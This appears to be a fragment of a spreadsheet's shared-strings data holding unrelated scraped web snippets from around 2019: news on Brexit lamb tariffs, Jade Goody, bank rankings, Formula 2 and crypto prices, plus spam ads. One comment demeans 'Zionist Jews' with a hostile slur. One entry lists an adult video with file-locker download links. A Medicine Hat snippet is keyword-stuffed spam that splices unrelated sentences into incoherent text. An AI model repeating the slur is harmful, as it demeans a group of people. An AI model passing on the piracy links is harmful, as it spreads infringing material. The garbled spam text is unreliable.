    <t>Don’t get me wrong I absolutely love my HomePods and it’s a petty criticism to make. I just feel like it would have been awesome to have ... Is anyone else disappointed that the HomePod has volume buttons instead of a “click wheel” like the OG iPods?</t>
  </si>
  <si>
    <t>Economists didn't think it was possible but it turns out the world can be fairer and richer.</t>
  </si>
  <si>
    <t>‘Government support should focus on stopping the lamb market from crashing’ – NEWS Original Source Government support should focus on stopping the lamb market from crashing, with the threat of a no-deal Brexit hitting home on the continent. Alex Black Alex is business reporter at Farmers Guardian covering areas including commodity prices, imports and exports, property and land across all Load More… Alex Black Alex is business reporter at Farmers Guardian covering areas including commodity prices, imports and exports, property and land across all Load More… Share This ‘Government support should focus on stopping the lamb market from crashing’ British Meat Processors Association chief executive Nick Allen said retailers in the EU were refusing to sign long-term contracts due to the threat of tariffs on lamb after a no-deal Brexit. “They are not saying they are not going to buy it, but they will not offer long-term contracts,” he said. Retailers were instead proposing to buy at ‘spot prices’ which, after tariffs, would make UK product uncompetitive. Mr Allen said come October 31, there would be an immediate ‘crash’ in farmgate prices, although they did not know how low it would go. National Sheep Association chief executive Phil Stocker said it showed it was already affecting the sector with people’s order books ‘fairly flat’. He added the uncertainty was around the allocations of tariffs and continuity of trade and if the Government could ‘relieve’ that, a crash could be averted. While this could raise issues at the World Trade Organisation with state aid rules, Mr Stocker said if money was going into the market anywhere it was going to ‘distort it’. Tariff “Let us just think about a way of relieving this tariff cost,” he said. While he was not surprised retailers did not want to commit, Livestock Auctioneers Association executive secretary Chris Dodds said it was good they would buy if the price was right. Mr Dodds urged the Government to find a way to support the industry which maintained a ‘realistic’ prime lamb price. “Headage payments will not stop the market crashing. It will encourage it,” he said. Duncan Wyatt, AHDB livestock lead analyst, highlighted the industry would not really know the impact until it happened, but UK farmers might not have to bear all the tariff impact due to global circumstances. “There is strong demand in Asia. In Australia and New Zealand, supplies are challenged,” said Mr Wyatt. He said if European countries wanted to make up volumes and the UK had third country status, buyers may meet the UK ‘somewhere in between’. Next Article Rosie Carne: ‘Farming is more than a job. It is a way of life and a lifestyle’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‘Government support should focus on stopping the lamb market from crashing’ – NEWS appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Staff Reporter</t>
  </si>
  <si>
    <t>The battle of the breakfast spreads is heating up in England after an Ashes inspired war of words took a new turn this weekend.</t>
  </si>
  <si>
    <t>Robyn Crawford</t>
  </si>
  <si>
    <t>Riders on "The Beast" managed to exit safely.</t>
  </si>
  <si>
    <t>Himmel ! , #himmel The post Himmel ! – Pavla Baumhoefer appeared first on Dekoration.</t>
  </si>
  <si>
    <t>Jade Goody was the original reality TV star, living her young life – and eventually her death – in front of rolling cameras and behind the lines of gossip columns. She found fame during her appearance on the third ever series of Big Brother, where she was both ridiculed and treasured for her lack of general knowledge and cockney lilt. Following her eviction, she went on to have a successful TV career, with her own reality TV show. She even released her own perfume, ‘Shh’. However, her fortunes changed when, in 2007, she re-entered the house for Celebrity Big Brother and became embroiled in a racism row that made her a hate figure, not just in the UK, but around the world. The controversy Broadcast on Channel 4 in January that year, Jade Goody was one of a star-studded line-up of contestants vying for the votes of viewers at home, who watched their every move in their millions from round-the-clock footage. She walked through the famous doors with her mother, Jackiey Budden and her then-boyfriend Jack Tweed. Jade Goody and Jack Tweedy arrive for Celebrity Big Brother series five (Getty Images) Her appearance soon generated headlines for the wrong reasons when, together with Danielle Lloyd and Jo O’Meara, they began to verbally bully fellow contestant Shilpa Shetty, a Bollywood actress. Goody told Shetty, among other things, that she needed “a day in the slums” and referred to her as “Shilpa Poppadom”. She was evicted from the house on 19 January 2007 after the public overwhelmingly voted for her to leave. ‘It was absolutely insane’ But there was something a little more heated waiting for the star in the outside world than a cacophony of boos and a grilling from Davina McCall. The broadcasting of the racist bullying had sparked so much ire around the nation, that it was debated in parliament. In India, where Shetty is an A-list celebrity, her followers burned effigies of Goody in the streets, amid calls from the Indian government to have the show suspended. “It was absolutely insane, the story just got so big so quickly,” Big Brother’s Little Brother host Dermot O’Leary explains in forthcoming documentary Jade: The Reality Star Who Changed Britain. “I remember seeing… guys burning effigies of Jade in India and I thought this s*** has got absolutely out of hand. “The incendiary nature of the whole thing made us really quite worried about her… at the same time it would have been remiss of me in my job not to hold her to account. Yeah, it was difficult.” The incident coincided with a then chancellor Gordon Brown’s trip to India. “I want Britain to be seen as a country of fairness and tolerance,” he told journalists at the time. “Anything detracting from this I condemn.” Record complaints After a police investigation concluded that Goody, Lloyd and O’Meara had not committed a hate crime in the house, Ofcom decided to investigate whether Channel 4 at breached viewing standards by allowing the incident to be aired. The TV watchdog received more than 44,500 complaints over several incidents, including ones in which contestants were filmed being derogatory about Indian cooking. In conclusion, Ofcom imposed an official sanction on the network, directing them to broadcast a statement of their findings three times during the airing of the eighth series of Big Brother. Shetty was announced as the winner of Celebrity Big Brother on Sunday 28 January, receiving 63 per cent of the public vote in her favour. Jade Goody in 2006, a year before the controversy (Photo: Jeff J Mitchell/Getty Images) During her interview with McCall, she said she had forgiven Goody. Shetty told the host: “Things happen, people make mistakes and we all learn from them. But I can say one thing for sure. Jade didn’t mean to be racist. She isn’t a racist. I really don’t want to leave England putting anyone in trouble.” After being dropped for several sponsors and been the subject of much vitriol on the tabloids, Goody apologised for her behaviour, appearing in articles and on TV shows to express her apology. The fee she earned from her appearance in the house was given to charity. She even made a trip to India to learn more about Indian culture and apologise to those she had offended. Goody went on to appear in the Indian version of Big Brother, Big Boss, in 2009. A cruel end Goody was so distraught by the mistake she’d made, she believed the terminal cancer she developed a year later was as a result of her racist behaviour. Speaking on the documentary, mother Jackiey Budden says: “One night she felt really scared because, obviously, she knew she was going very soon. “She said, ‘Mum I feel like they’re coming to get me. They’re coming to get me. It’s going all dark.’ “She said, ‘Is that because I was so bad in Big Brother?'” Jade Goody leaves hospital in 2009 (Photo: Getty Images) Goody died two years later, aged 27. She is survived by her husband Jack Tweed, who she married a month before her death, and sons from her previous relationship with Jeff Brazier, Bobby, 16, and Freddie, 14. Jade: The Reality Star Who Changed Britain is airing on Channel 4 on Wednesdays at 9pm More on TV Everything you need to know about ITV's new drama Deep Water Here is where the new ITV drama Deep Water is filmed What happened to Jade Goody's former partner Jeff Brazier? Everything you need to know about Interior Design Masters Everything you need to know about BBC's new travel show Sacred Wonders Everything you need to know about harrowing docu-drama Murder Case The post Jade Goody and Shilpa Shetty: What happened in the Big Brother racism controversy that marred reality TV star’s career appeared first on inews.co.uk. The post Jade Goody and Shilpa Shetty: What happened in the Big Brother racism controversy that marred reality TV star’s career appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Kristyn Anthony</t>
  </si>
  <si>
    <t>The financial institution turns construction on a new head office into an opportunity to remind people of its core values. Read More</t>
  </si>
  <si>
    <t>Jane Kelly</t>
  </si>
  <si>
    <t>I MET someone on the bus who I know from my church. I was glad to see her: meeting people in the street and chatting is so different from my former life in London. Unfortunately, some of these conversations are all too predictable. ‘I’ve just been to the memorial gathering for Hiroshima,’ she breathed, barely audible with self-righteous satisfaction as the bus set off. I felt from her tone that only one response was expected. I didn’t give it. ‘Well, it ended the war,’ I said somewhat cheerfully. ‘That is such a lie,’ she said. ‘The Japanese had already sued for peace. It was just genocide by America.’ I said I remembered how my parents and grandparents talked about it, how they were convinced that it had ended the war and stopped yet more killing going on. From them I got a sense of how people thought about it at the time. ‘You have swallowed the propaganda,’ she said, ‘that’s what the Americans want you to believe.’ I had swallowed the wrong thing, but she hadn’t. As she is such a breathy, ethereal person, obviously so much a pacifist, probably gluten-free and fragile, I didn’t like to say much more. That type of woman is everywhere in east Oxford; good-hearted, virtuous, at least outwardly, and convinced that ‘they’, which could be the USA or the evil capitalist press, are excreting a constant stream of lies which only the truly misguided swallow. We got to discussing life drawing and painting. I wondered if she was interested, thinking I’d seen her at one of the many local groups. ‘I don’t wish to be with naked people,’ she told me. ‘It’s not modest.’ Obviously, I hadn’t seen her there. As we got off the bus a very elderly Muslim man pushed past us both. Many are extremely friendly, as if old age has freed them from certain constraints, but this one shot us a look of contempt. Seeing him flap past, I told her how bothered I’d been by a recent BBC Radio 4 edition of Poetry Extra about the Gujarati Writers Forum in the UK. Apparently, these Indian poetry groups are popular in many towns. The programme was introduced by the poet Daljit Nagra, winner of the Forward Poetry Prize, recipient of the Royal Society of Authors Travelling Scholarship, regular judge of literary awards with work on the GCSE syllabus, and Judith Palmer, Remain activist and a director of the Poetry Society. They talked of the ‘new forms’ these migrant Indian writers were finding, and the humour of some of the verse. We heard some elderly men chuckling before it was revealed, without any comment from Nagra or Palmer, that women are not allowed to take part in these groups. Gujarat is mainly Hindu, ten per cent Muslim. I don’t know what religion is most represented by these poets, but an old Gujarati man was heard saying, ‘Ladies are not encouraged to write. They are the muse of men, not writers.’ There was a lot of haw-hawing, then another sage added, ‘We sometimes invite girls, the pretty ones, to come and dance for us.’ This was followed by jolly music and the sound of girls singing. It was impossible to imagine elderly white men making similar remarks on Radio 4 or anywhere without any question being asked. No comment was made about this flagrant and illegal sexism by Nagra or Palmer, who I would chance a bet are both good ‘feminists’. I told my Oxford friend about this. She hadn’t heard the programme as she has no radio. She has no TV and doesn’t read any papers. ‘There’s no point. It’s all propaganda,’ she said. ‘That is the BBC view, that’s how they made it sound.’ ‘There was no comment from the BBC,’ I expostulated. ‘My point is, they said nothing.’ ‘They have their agenda,’ she said knowingly. ‘They always make things sound a certain way. You need to be careful not to be fooled by that.’ As we parted decisively, I was left wondering how it is that what she hears is so very different from what I hear. We are as divided as if one of us were speaking Gujarati. ‘Who are “They”, spreading this propaganda that fools like me swallow while you remain immune?’ I wanted to ask, but conversation between us has now ended, she in one camp, I in another. She silently battling the evil forces of capitalism, me being seriously and regularly duped. I wonder, too, with what she and her tribe intend to replace the evil ‘They’ when the time comes? I’d rather not know but I suspect it looks a lot like Jeremy Corbyn. The post An encounter with Ms Self-Righteous appeared first on The Conservative Woman. The post An encounter with Ms Self-Righteous appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>JERUSALEM — Israel on Thursday barred the entry of two American Democratic congresswomen who had planned to visit the West Bank, hours after President Trump had urged the country to block them. Link: https://www.nytimes.com/2019/08/15/world/middleeast/trump-israel-omar-tlaib.html We will, we will, fuck you, on November 3rd, 2020. The Zionist Jews are the biggest ass kissers of Yankee Imperialism. Boycott Israel. See the right hand column of Cuba Journal.</t>
  </si>
  <si>
    <t>Fears over its financial stability have not stopped Metro Bank from being named Britain’s best current account provider, according to a leading survey. More than 80 per cent of customers said they would recommend the bank to their friends and family, putting it joint-top with First Direct in a table published by the Competition and Markets Authority. At the other end of the table, RBS spent a second successive year in the bank account basement, with just 46 per cent saying they would recommend its services. Metro Bank was named the highest-rated current account provider in a survey published by the UK’s competition watchdog, along with HSBC-owned First Direct The percentage of RBS customers polled who would encourage their friends and family to open an account with the taxpayer-owned bank has fallen by 3 per cent compared to last August’s survey. While Metro’s popularity has slid by a percentage point since the last CMA findings in February this year, meaning it no longer tops the table in its own right, it represents a rare piece of good news in a difficult year for the challenger bank. It has been engulfed in a crisis involving its loan book that saw it require an emergency cash injection, while its share price has collapsed and there were even fears over the safety of deposits after social media rumours led to customers at the Harrow branch queueing to pull their money out. As well as being the joint-top rated current account service provider, 85 per cent of Metro’s customers would recommend its in-branch service, six points ahead of Nationwide in second place. Metro Bank’s difficult 2019 came to a head when rumours that circulated on social media led to fears of a bank run, with customers in one branch queuing to pull their money out Craig Donaldson, Metro’s chief executive, said: ‘We are extremely proud to still hold the top spot for personal current account service and maintain our top two position among business customers. ‘Service and convenience are at the heart of everything we do at Metro Bank and we’re thrilled that our customers can see this.’ The full table for personal current accounts is below: RBS spent a second successive year at the bottom of the table when it came to whether users would recommend it to friends and family The figures are now required by regulators to help make it easier for customers to compare bank account providers and are published in February and August every year. The latest results from the CMA came from a survey of 13,760 people carried out between July 2018 and June 2019. As well as asking customers whether they’d recommend their bank account provider, the survey also asks customers to rate their bank’s service in branches, its online and mobile banking offering and its overdrafts. The top two of Metro Bank and First Direct were followed by five of the UK’s biggest bank account providers in Nationwide, Barclays, Lloyds, HSBC, Santander and NatWest. TSB’s popularity climbed 5 per cent on last year to 56 per cent as it recovered from a 2018 overshadowed by massive IT problems. However, perhaps unsurprisingly, it remained bottom of the table when it came to its online and mobile banking, with just 63 per cent of customers saying they’d recommend the bank’s offering. The full table for online and mobile banking is below: The survey also assessed branch service, overdraft services and online and mobile banking. Barclays came top when it came to its digital offering with TSB at the bottom Barclays came top of that table, with 86 per cent recommending its online and mobile banking, followed by First Direct, Metro Bank and Nationwide. When it came to overdrafts First Direct came top in its own right with 77 per cent saying they’d recommend it to friends and family, followed by Metro, Barclays, HSBC and Santander. First Direct offers a £250 interest-free overdraft buffer for its current account customers. The CMA’s league tables are also designed to help people make an informed choice if they decide to switch. If you do want to change your current account provider, the Current Account Switch Service guarantees to switch your account, including any direct debits, over in seven days. #bcaTable h3,#bcaTable p {margin: 0; padding: 0; border: 0; font-size: 100%; font: inherit; vertical-align: baseline;} #bcaTable {font-family: Arial, ‘Helvetica Neue’, Helvetica, sans-serif; font-size:14px; line-height:120%; margin:0 0 20px 0; padding:0; border:0; display:block; clear:both;} #bcaTable {width:636px; float:left; background-color:#f5f5f5} #bcaTable .title {width:100%; background-color:#58004c} #bcaTable .title h3 {color:#fff; font-size:16px; padding:7px 8px; font-weight:bold; background:none} #bcaTable .item {display:block; float:left; margin-bottom:10px; border-bottom:1px solid #e3e3e3; margin:0; padding-bottom:0px; width:100%} #bcaTable .item#last {border-bottom:0px solid #f5f5f5} #bcaTable .copy {padding:7px 10px 7px 10px; display:block; font-size:14px} #bcaTable a.mainLink {display:block; float:left; width:100%} #bcaTable a.mainLink:hover {background-color:#E6E6E6; border-top:1px solid #e3e3e3; position:relative; top:-1px; margin-bottom:-1px} #bcaTable a.mainLink:first-child:hover {border-top:1px solid #58004c;} #bcaTable a .copy {text-decoration:none; color:#000; font-weight:normal} #bcaTable .copy .red {text-decoration:none; color:#de2148; font-weight:bold} #bcaTable .copy strong, #bcaTable .copy bold {font-weight:bold} #bcaTable .footer {display:block; float:left; width:100%; background-color:#e3e3e3; margin-bottom:0} #bcaTable .footer a {float:right; color:#58004c; font-weight:bold; text-decoration:none; margin:10px 18px 10px 10px} #bcaTable .mainLink p {float:left; width:524px} #bcaTable .mainLink .thumb span {display:block; float: left; padding:0; line-height:0} #bcaTable .mainLink .thumb {float:left; width:112px } #bcaTable .mainLink img {width:100%; height:auto; float;left} #bcaTable .article-text h3 {background-color:none; background:none; padding:0; margin-bottom: 0} #bcaTable .footer span {display:inline-block!important;} @media (max-width: 670px) { #bcaTable {width:100%} #bcaTable .footer a {float:left; font-size:12px; } #bcaTable .mainLink p {float:left; display:inline-block; width:85%} #bcaTable .mainLink .thumb {width:15%} #bcaTable .mainLink .thumb span {padding:10px; display:block; float:left} #bcaTable .mainLink .thumb img {display:block; float:left; } #bcaTable .footer span img {width:6px!important; max-width:6px!important; height:auto; position: relative; top:4px; left:4px} #bcaTable .footer span {display:inline-block!important; float:left} } @media (max-width: 425px) { #bcaTable .mainLink {} #bcaTable .mainLink p {float:left; display:inline-block; width:75%} #bcaTable .mainLink .thumb {width:25%; display:block; float:left} } THIS IS MONEY’S FIVE OF THE BEST CURRENT ACCOUNTS</t>
  </si>
  <si>
    <t>But this official wouldn’t take no for an answer and herded me over to the injured bull rider—a short guy with a big cowboy. Preferred Dentist Near Medicine Hat He studied medicine at the University of Texas at San Antonio. had killed at least twenty people in and around a Walmart. The extreme right-wing has used all kinds of arguments against socialized medicine. I refer to these. for the extreme. ‘All three spoke Spanish. All three were Americans’ – He studied medicine at the Fun Things to Do in Medicine Hat with Kids: Family-friendly activities and fun things to do. See TripAdvisor's 753 traveller reviews and photos of kid friendly Medicine Hat attractions Beyond the bowling, there are also multiple flat screen tvs, Medicine Hat’s only kid friendly pool tables, a Kidsworld play park and nightly food and drink specials. Panorama Lanes is a place where kids, and the entire family can spend hours at a time. Visit this. Are we getting value for our health care dollars? – The Fraser Institute says an average Canadian family of four will pay $13,311 this year for government health care. That is a 65.8 per cent increase in 22 years. Additionally, you pay for dental. From hiking under towering redwoods to ice skating at Snoopy’s favorite rink and even an overnight African-style safari, 4 of 5 on TripAdvisor and ranked #5 of 173 restaurants in Medicine Hat. Flights Vacation Rentals Restaurants Things to do. Food Delivery Restaurants in Medicine Hat Kid Friendly Restaurants in Medicine Hat Late Night Restaurants in Medicine Hat. Friendly Rivalry: Rogers Cup cities Toronto and Montreal a contrast in style – He learned the sport there and recalls taking the bus up to York University as a kid to watch world-class. Lapierre said there’s a friendly rivalry between the two organizing teams. Top Dentist Near Medicine Hat At the top of your Chrome window, near the web address, click the green lock labeled Secure. In the window that pops up, make sure Location is set to Ask or Allow. Opponents of refinery location take case to Supreme Court – Two environmental groups who say North Dakota regulators should have intervened in the Preferred Dentist Near Medicine Hat Alberta Number 1 Dental Clinic In Medicine Hat Alberta Locate and compare Dentists in Medicine Hat AB, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening dentistry images. Crestwood dentists in Medicine Hat provide uality entertainment for Whoop-Up Days – The “Acrobark Aerial Superdog Show” is part of a lineup of free, family-friendly events at this year. This week’s “tip of the hat” salute goes to Jordana Kohn. Best Kid Friendly Restaurants in Medicine Hat, Alberta: Find TripAdvisor traveler reviews of THE BEST Medicine Hat Kid Friendly Restaurants and search by price, location, and more. Medicine Hat Medicine Hat Tourism Medicine Hat Hotels Medicine Hat Bed.</t>
  </si>
  <si>
    <t>[Magnetic Balls VS Monster Magnets in Slow Motion | Magnetic Games] (Viewer #385,163) It’s a bit slow-paced in spots, but I love the slow-mo of the magnet balls attacking the big magnets. 1 0</t>
  </si>
  <si>
    <t>The federal government has told Australians planning on travelling to Hong Kong to "exercise a high degree of caution" after raising its advice travel warning.</t>
  </si>
  <si>
    <t>A government military base in the Lower Shabelle region of Somalia has been struck by car bombs and gunfire, residents and a military officer say, with the al Qaeda-linked al Shabaab group claiming responsibility for the attack.</t>
  </si>
  <si>
    <t>MORNING BRIEFING: An airline worker is extradited from Melbourne to Sydney over a $155 million methamphetamine seizure, and debate will get underway today on the bill to decriminalise abortion in NSW after opponents staged an overnight vigil.</t>
  </si>
  <si>
    <t>Welcome to LocalAdz, your total internet marketing results firm. We specialize in Premium WordPress Web Page Design, Mobile Web Design and are Search Results Management specialists. Whatever you want to be recognized for on the Web, we can make you a VISIBLE influencer in your geographic location. Shop in Michigan Center MN. We use cutting edge methods for your keywords that are PROVEN and EFFECTIVE at increasing YOUR position in the search engines! We are a complete custom Premium Website Design, SEM Michigan Center and Internet Marketing firm. We can meet all of your Custom Web Design and Search Engine Management needs. We are experienced Web designers and search engine managers using the latest technology and online marketing techniques. We use the latest Web standards to meet your goals and expectations. We create websites and mobile websites that function across all browsers and mobile devices and load in the blink of an eye. Affordable Custom Website Design in Michigan Center MN | Web Design Company &amp; Marketing Agency We utilize W3C compliant, search engine friendly code in all of our projects. We bring a user-centric philosophy and process to each and every decision, with our experience in usability and design. In short we do more than just design websites that are “pretty”. We design websites that help convert visitors into clients! We want to make Internet Marketing an accessible and successful addition to any marketing plan. We are a leading Internet Marketing and Search Engine Management Michigan Center MN Specialists. We can help drive more unique visitors to your website and convert them to buyers. We have been designing Websites and providing SEM since 2009; there have been MANY changes over these last few years. As technology has improved so has the web. It is more important than ever to keep up with the industry standards and what Google expects to see in web design. Because the best website on the planet will do you no good if people cannot find it. Good SEM and quality Web Design go hand in hand if you truly want to dominate your competition. Let LocalAdz help. We are not only one of the best SEM Companies in Michigan Center, we also offer top notch web design and development. Whether you need just a simple informational HTML website, or a custom built database, or anything in between we got it covered. Shop for Web Design Portfolio in Michigan Center MN. More Michigan Center MN Information Michigan Center Minnesota Weather Nearby Locations Website Designer in Hoonah AK Web Designer in Plymouth CT Web Design Portfolio in Rotan TX Web Designers in Rifton NY Originally Posted on April 5, 2011 and reposted on May 13, 2019"&gt;Website Designer in Venus FLOriginally Posted on April 5, 2011 and reposted on May 13, 2019 Web Developer in Alpine WY Web Design Services in Mountain City TN Web Design Services in Woodacre CA Web Designer in Dublin OH Web Design Company in Samuels ID Michigan Center Minnesota Map Republished by Blog Post Promoter The post Web Design Portfolio in Michigan Center MNOriginally Posted on January 2, 2014 and reposted on August 5, 2019 appeared first on Free Consultation (702) 518-6567.</t>
  </si>
  <si>
    <t>Nubiles – Nasty D – 1v A Gift For You Model(s): Nasty D Released Date: June 23, 2015 Size: 646 MB Quality: MPEG-4, 1080p, 00:12:07 rapidgator:idolxx.com_062315.nubi.nastyd.1080.mp4 uploaded:idolxx.com_062315.nubi.nastyd.1080.mp4 mexashare:idolxx.com_062315.nubi.nastyd.1080.mp4 katfile:idolxx.com_062315.nubi.nastyd.1080.mp4</t>
  </si>
  <si>
    <t>The pound euro exchange rate fell today, leaving the pairing trading around €1.082 after worse-than-expected UK growth figures for the second quarter. UK GDP figures for June fell from 1.8 percent to 1.2 percent – a drop of 33 percent, the country’s worst rate of growth in six and a half years. Daily Express :: Finance Feed Pound euro exchange rate sinks as UK economy contracts over Brexit uncertainty</t>
  </si>
  <si>
    <t>The Indian Prime Minister's decree revoking Kashmir's special status could lead to more violence.</t>
  </si>
  <si>
    <t>The front pages focus on the new government’s Brexit strategy and a potential medical breakthrough. Read more? Click here</t>
  </si>
  <si>
    <t>FIA Formula 2 championship leader Nyck de Vries started the Hungary weekend in Budapest fastest overall in practice ahead of Prema Racing‘s Mick Schumacher and BWT Arden‘s Anthoine Hubert. The ART Grand Prix driver set a time of 1:29.236 early in the session and remained on top, ahead of Schumacher, and Hubert, who was quickest throughout the second and third sector. de Vries enters the weekend on top of the championship with 170 points to his name, and returns to a track where he claimed the Feature race win last year. Practice began in warm conditions with Hubert, Louis Delétraz and de Vries heading out onto the track first. MP Motorsport‘s Jordan King placed the first representative hot lap of the session with a time of 1:31.991, before the times quickly began to fall as the rest of the field set their first flying laps. UNI-Virtuosi Racing‘s Luca Ghiotto in his first representative run set a time of 1:29.893 ahead of de Vries and the two Prema’s of Sean Gelael and Schumacher. Hubert followed behind with fifth place as ten minutes of the session passed. Two-time Hungary F2 winner Nobuharu Matsushita in the Carlin pushed to third place with his first time of the session as Hubert quickly jumped to the top of the standings with a 1:29.544 lap time. Gelael, in the Prema, lost the rear of his car at Turn 7, stopping off the circuit and causing a Virtual Safety Car. Gelael was pushed off the circuit, ending his session as a result and ending the VSC period. de Vries quickly jumped up the order, surpassing Hubert for the top spot with a 1:29.236 lap, whilst Schumacher grabbed second place, joining the Dutchman in beating the Arden driver. Guanyu Zhou and Jack Aitken rounded off the top five as the session completed twenty minutes of practice. Championship contender Nicholas Latifi throughout the session struggled to set a clean lap, encountering traffic during his hot laps. But the Canadian in the DAMS colours managed to place a time with the twelfth best time, just before the red flag was brought out after Ralph Boschung in the Trident suffered spectacular crash at Turn 1, hitting the tyre barriers and ending his session. The Swiss driver, who makes his return to the series after missing two rounds, got out of the car okay as the marshals cleared the wreckage at the first turn. Boschung was eighteenth fastest at the time of the accident. The session resumed with twelve minutes left, with the drivers queuing in the pit exit to conduct practice starts. de Vries remained on top of the session, despite having a spin at Turn 5 when he lost control of his ART car with five minutes remaining. The Dutch driver ended the practice on top, ahead of Schumacher and Hubert. King and Zhou rounded off the top five with championship contenders Aitken, Sérgio Sette Câmara and Ghiotto following behind. Matsushita ended the session in ninth ahead of Britain’s Callum Ilott in tenth. Latifi ended a challenging practice session in twelfth place. Position Number Team Driver Nationality Time 1 4 ART Grand Prix Nyck de Vries NED 1:29.236 2 9 PREMA Racing Mick Schumacher GER +0.284 3 19 BWT Arden Anthoine Hubert FRA +0.308 4 16 MP Motorsport Jordan King GBR +0.316 5 7 UNI-Virtuosi Racing Guanyu Zhou CHI +0.385 6 15 Campos Racing Jack Aitken GBR +0.469 7 5 DAMS Sergio Sette Camara BRZ +0.565 8 8 UNI-Virtuosi Racing Luca Ghiotto ITA +0.585 9 2 Carlin Motorsport Nobuharu Matsushita JPN +0.606 10 11 Sauber Junior Team By Charouz Callum Ilott GBR +0.618 11 1 Carlin Motorsport Louis Deletraz CHE +0.652 12 6 DAMS Nicholas Latifi CAN +0.718 13 12 Sauber Junior Team By Charouz Juan Manuel Correa USA +0.803 14 20 Trident Giuliano Alesi FRA +0.918 15 3 ART Grand Prix Nikita Mazepin RUS +0.953 16 14 Campos Racing Arjun Maini IND +1.114 17 10 PREMA Racing Sean Gelael INO +1.621 18 21 Trident Ralph Boschung CHE +1.662 19 17 MP Motorsport Mahaveer Raghunathan NED +1.826 20 18 BWT Arden Tatiana Calderon COL +2.432</t>
  </si>
  <si>
    <t>That’s awesome! The post Breaking Benjamin – Live At Rock Am Ring 2016 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Technology is altering customer expectations and business processes. As savvy insurance professionals, it’s vital that we keep up to stay relevant and competitive. Are you up-to-date on the latest in insurance technologies? Event format • Starts with a combination of… The post Insurance Institute of Ontario- InsurTech Forum: Thriving Through Technology appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>In a brand new show titled ‘Yeah, I said it’, we talk about some burning topics surrounding the Pittsburgh Steelers. With Antonio Brown and Le’Veon Bell gone from the Pittsburgh Steelers, most fans have enjoyed a Training Camp/Preseason with their favorite team not being called “Team Turmoil”. What people are hearing is how team chemistry has never been higher. Players are loving the game of football again, but what if the success of the 2019 Steelers won’t be based around chemistry. No, it will come down to what it always comes down to — talent. This is where the newest BTSC podcast “Yeah, I Said It” comes in. My co-host on ‘The Standard is the Standard’, Lance Williams tries to decipher why chemistry is overrated. Time to deliver the goods on the latest show. If you haven’t heard, we have a YouTube channel, and the main reason for this is to increase the sound quality on our shows. But if you’re a visual learner you can watch the show below. Be sure to subscribe to our channel! Check out the audio below: Feel free to give us your thoughts on the topic in the comment section below, and don’t forget to follow us on all our audio platforms by following the links below: Apple Users: CLICK HERE Spotify: CLICK HERE Google Play: CLICK HERE</t>
  </si>
  <si>
    <t>Danish Korean Dictionary – travel dictionary to translate Danish to Korean. Click on the list to show Danish or Korean synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Danish Korean Dictionary →</t>
  </si>
  <si>
    <t>If The Master’s University women’s volleyball team was looking for an opportunity to fold to Rocky Mountain on Thursday, it had options. The No. The post TMU Women’s Volleyball Takes Down No. 13 Rocky Mountain appeared first on WSN.</t>
  </si>
  <si>
    <t>Andrew Musgrove</t>
  </si>
  <si>
    <t>Newcastle United’s newest number nine Joelinton has spoken about his hopes and aims for the new season – and Alan Shearer This post written by Andrew Musgrove originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>The British actor met with the white supremacist-turned-FBI informant while preparing for the role. See full article at Film-news.co.uk » The post Jamie Bell feared for his life while playing real-life neo-Nazi appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Bitcoin price needs a Bitcoin ETF now more than ever to correct to June 2019 highs. It is important that Ethereum stays above $170 if not $180. The range resistance at $0.2841 will determine the path for Ripple. The market has been in shambles for two days consecutively. The last weekend session saw most cryptocurrencies including the top three Bitcoin Ethereum and Ripple close the week with a win. However, cryptos have been developing a higher affinity to the bear pressure this week. Before we dive into the price action, it is worthwhile to take note of other events in the industry. First, Bitcoin is trading at $80 premium in Hong Kong. Residents are resorting to cryptocurrencies as alternative forms of payment to avoid surveillance by Chinese authorities. The past few weeks have seen protests in the city escalate quickly as residents fight against main-land China surveillance. Hong Kong continues to operate as an independent jurisdiction where cryptocurrency trading and other related activities are allowed. This is contrary to the strict laws in mainland China banning all mining and trading activities. Residents of Hong fear freedom could be taken away with the Chinese authorities moving closer. In other news, The Securities and Exchange Commission (SEC) in the United States as reported by FXStreet postponed three Bitcoin exchange-traded funds (ETFs). The BTC ETFs proposals filed by VanEck, Bitwise, and Wilshire Phoenix approval or rejection will have to wait longer. The SEC said that it needs more time to study the proposals and better under understand the crypto market. Bitcoin more than ever needs to gain ground above $10,000 Bitcoin price needs a Bitcoin ETF now more than ever. While the price ignored the delay by the SEC earlier in the week, its effect is catching up with Bitcoin. Recovery from the devastating drop to a low around $9,469 met resistance at $10,062. A cluster of technical indicators at this level range from the Bollinger Band 15-mins Middle, SMA 10 15-mins, SMA 5 1-hour, previous high 15-mins, previous high 1-hour and Fibonacci 23.6% 1-min. Re-emergence above this level will face resistance at $10,271 highlighted by the 38.2% Fib level 1-Day. The next significant resistance target is $10,791 where the BB 1-Day Middle meets the BB 4-hour Middle. After this, the only bump before $11,000 is $10,985 where the previous high 1-Day, Pivot Point 1-week S1 and SMA 100 1-hour form a confluence. The king of cryptocurrencies has a shortage of viable support areas. Therefore, if Bitcoin plunges towards $9,000, the only significant support area in sight is $9,125. A zone playing host to the previous month low and Pivot Point 1 week S3. Ethereum’s return to $200 will be an uphill task Like Bitcoin, Ethereum dropped like dead weight in the air ravaging through the $200 tentative support. While a balance was struck slightly above $170, correction is still hampered above $180. The confluence tool cites the first hurdle at $186 converging the Previous High 4-hour and the Pivot Point 1-Week S2. If the buyers manage to retrace the steps above $190, they must be ready to battle the high concentration of sellers at $192 highlighted by the BB 1-hour Upper and previous Month Low. The journey above $200 will not be with a struggle at $194 and $199.85 respectively. On the downside, it is important that Ethereum stays above $170 if not $180. This is because of the scarcity of credible support areas. The only significant support is seen at $167.39 currently linked to the Previous Point 1-Month S1. It will take a miracle for Ripple to scape this range resistance Following the drop to October 2018 levels, Ripple is attempting a recovery. However, the weak bullish momentum means that recovery will not come easy. Besides, the bulls already feel paralyzed by the resistance in a range between $0.2624 and $0.2841. The range support ($0.2624) holds a cluster of indicators ranging from the Previous High 